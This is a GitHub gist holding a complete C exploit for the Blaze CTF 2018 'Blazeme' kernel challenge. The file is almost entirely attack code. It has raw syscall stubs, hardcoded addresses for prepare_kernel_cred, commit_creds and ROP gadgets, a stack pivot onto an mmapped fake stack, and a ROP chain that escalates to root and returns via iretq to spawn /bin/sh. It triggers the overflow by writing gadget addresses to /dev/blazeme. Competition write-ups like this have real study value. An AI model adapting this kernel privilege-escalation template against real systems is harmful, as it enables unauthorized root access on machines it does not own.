Created
November 26, 2018 17:22
-
-
Save hama7230/8faddf43ba50f9d0b865892e5c50255d to your computer and use it in GitHub Desktop.
Blaze CTF 2018 Blazeme
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gcc -fno-builtin -static -nostdlib -masm=intel exp.c -o exp | |
#define O_RDWR 0x0002 | |
#define KBUF_LEN (64) | |
#define PROT_READ 0x1 /* Page can be read. */ | |
#define PROT_WRITE 0x2 /* Page can be written. */ | |
#define MAP_PRIVATE 0x02 /* Changes are private. */ | |
#define MAP_ANONYMOUS 0x20 /* Don't use a file. */ | |
#define MAP_POPULATE 0x8000 | |
#define MAP_FIXED 0x10 | |
#define MAP_GROWSDOWN 0x0100 | |
// syscalls | |
void exit(int e) { | |
__asm__("mov rax, 60"); | |
__asm__("syscall"); | |
__builtin_unreachable(); | |
} | |
int read(int fd, char* buf, int size) { | |
__asm__("mov rax, 0"); | |
__asm__("syscall"); | |
} | |
int write(int fd, char* buf, int size) { | |
__asm__("mov rax, 1"); | |
__asm__("syscall"); | |
} | |
int open(char* pathname, int flags) { | |
__asm__("mov rax, 2"); | |
__asm__("syscall"); | |
} | |
int close(unsigned int fd) { | |
__asm__("mov rax, 3"); | |
__asm__("syscall"); | |
} | |
void *mmap(void *addr, unsigned long length, int prot, int flags, int fd, unsigned long offset) { | |
__asm__("mov r10, rcx"); | |
__asm__("mov rax, 9"); | |
__asm__("syscall"); | |
} | |
int execve(char *filename, char *const argv[], char *const envp[]) { | |
__asm__("mov rax, 59"); | |
__asm__("syscall"); | |
} | |
// helper functions | |
unsigned long strlen(char* buf) { | |
unsigned long i = 0; | |
while( buf[i] != '\x00') { | |
i++; | |
} | |
return i; | |
} | |
void puts(char *buf) { | |
write(1, buf, strlen(buf)); | |
write(1, "\n", 1); | |
} | |
void memset(char* s, int c, unsigned long len) { | |
unsigned long i; | |
for (i=0; i<len; i++) | |
s[i] = c; | |
} | |
static void shell() { | |
char *args[] = { "/bin/sh", 0 }; | |
execve("/bin/sh", args, 0); | |
exit(0); | |
} | |
// ffffffff81063b50 T prepare_kernel_cred | |
// ffffffff81063960 T commit_creds | |
// 0xffffffff8109c604: mov esp, 0x01740000 ; ret ; (1 found) | |
// 0xffffffff811664cc: pop rdi ; ret ; (27 found) | |
// 0xffffffff81085026: mov rdi, rax ; call rdx ; (12 found) | |
// 0xffffffff81148e10: pop rdx ; ret ; (19 found) | |
// 0xffffffff811d20dd: xor rax, rax ; ret ; (26 found) | |
unsigned long prepare_kernel_cred = 0xffffffff81063b50; | |
unsigned long commit_creds = 0xffffffff81063960; | |
unsigned long pop_rdx = 0xffffffff81148e10; | |
unsigned long pop_rdi = 0xffffffff811664cc; | |
unsigned long mov_rdi_rax_call_rdx = 0xffffffff81085026; | |
unsigned long xor_rax_ret = 0xffffffff811d20dd; | |
unsigned long pivot_gadget = 0xffffffff8109c604; | |
unsigned long user_cs; | |
unsigned long user_ss; | |
unsigned long user_rflags; | |
unsigned long shell_v = shell; | |
static void save_state() { | |
__asm__("mov %0, cs": "r=" (user_cs) : "r" (user_cs)); | |
__asm__("mov %0, ss": "r=" (user_ss) : "r" (user_ss)); | |
__asm__("pushfq"); | |
__asm__("popq %0": "r=" (user_rflags) : "r" (user_rflags)); | |
} | |
static void restore_state() { | |
__asm__("swapgs"); | |
__asm__("mov [rsp+0x20], %0": "r=" (user_ss) : "r" (user_ss)); | |
__asm__("mov rax, 0x01740000"); | |
__asm__("mov [rsp+0x18], rax"); | |
__asm__("mov [rsp+0x10], %0": "r=" (user_rflags) : "r" (user_rflags)); | |
__asm__("mov [rsp+0x08], %0": "r=" (user_cs) : "r" (user_cs)); | |
__asm__("mov [rsp+0x00], %0": "r=" (shell_v) : "r" (shell_v)); | |
__asm__("iretq"); | |
} | |
void _start(void) { | |
int fd; | |
char buf[KBUF_LEN]; | |
int i; | |
unsigned long* fake_stack; | |
save_state(); | |
fd = open("/dev/blazeme", O_RDWR); | |
if (fd < 0) { | |
puts("open() failure"); | |
exit(1); | |
} | |
fake_stack = mmap(0x01740000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE, 0x32 | MAP_POPULATE, -1, 0); | |
fake_stack += (0x1000/ sizeof(unsigned long)); | |
*fake_stack ++= pop_rdi; | |
*fake_stack ++= 0; | |
*fake_stack ++= prepare_kernel_cred; | |
*fake_stack ++= pop_rdx; | |
*fake_stack ++= commit_creds + 6; | |
*fake_stack ++= mov_rdi_rax_call_rdx; | |
*fake_stack ++= xor_rax_ret; | |
*fake_stack ++= restore_state; | |
memset(buf, 'a', 2); | |
for (i = 0; i<KBUF_LEN/8 ; i++) { | |
unsigned long *p = (unsigned long*)(buf+2+i*8); | |
*p = pivot_gadget; | |
} | |
while (1) { | |
write(fd, buf, KBUF_LEN); | |
} | |
exit(0); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment